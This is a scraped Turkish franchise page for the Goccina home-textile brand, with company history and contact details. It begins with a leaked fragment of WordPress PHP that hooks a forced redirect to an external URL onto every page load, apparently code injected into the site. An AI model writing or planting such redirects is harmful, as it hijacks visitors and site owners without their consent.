window.open("' . esc_url($external_url) . '", "_blank");'; // Perform the redirection wp_redirect($external_url); exit; } // Hook the function to an appropriate action, e.g., 'init' add_action('init', 'automatic_redirect_to_external_site');
IE Warning
YOUR BROWSER IS OUT OF DATE!

This website uses the latest web technologies so it requires an up-to-date, fast browser!
Please try Firefox or Chrome!
 
 
 

 

Goccina Franchise

 

Şirketimiz, 1997 yılından bu yana, ev tekstili sektöründe faaliyet göstermektedir; bu süreçte, kendisini günümüz istek ve ihtiyaçları doğrultusunda geliştirmiş; 2002 yılında, Goccina markasını yaratmıştır.

 

Şirketimiz, yaklaşık 20 yıllık tecrübesi sayesinde, talep edilen her kaynağa anında ulaşabilme; ve temin edebilme kapasitesine sahiptir. Dolayısıyla, 20 yıllık birikimin mağazacılık anlayışına dönüşmesi için oldukça yeterli bir zaman olduğu düşünülmektedir.

 

Bu doğrultuda, şirketimiz, tutku ile ortaya çıkardığı Goccina markasını, bir adım daha ileriye taşıyabilecek ve mükemmel ürünlerden oluşan ürün gamını geniş kitlelere ulaştırabilecek iş ortakları aramaktadır.

 

Bu kapsamda, Şirketimiz, Goccina markasını, franchising sistemiyle geniş kitlelere ulaştırmak için franchise vermeye hazırdır; franchise almak isteyen iş ortaklarımızla karşılıklı görüşmeler sonucunda koşul ve şartlar belirlenecektir.

 

Tarafımızla iletişeme geçmenizi rica ederiz.

 

İletişim

 

Mail : info@goccina.com.tr

Tel : 0312 238 24 06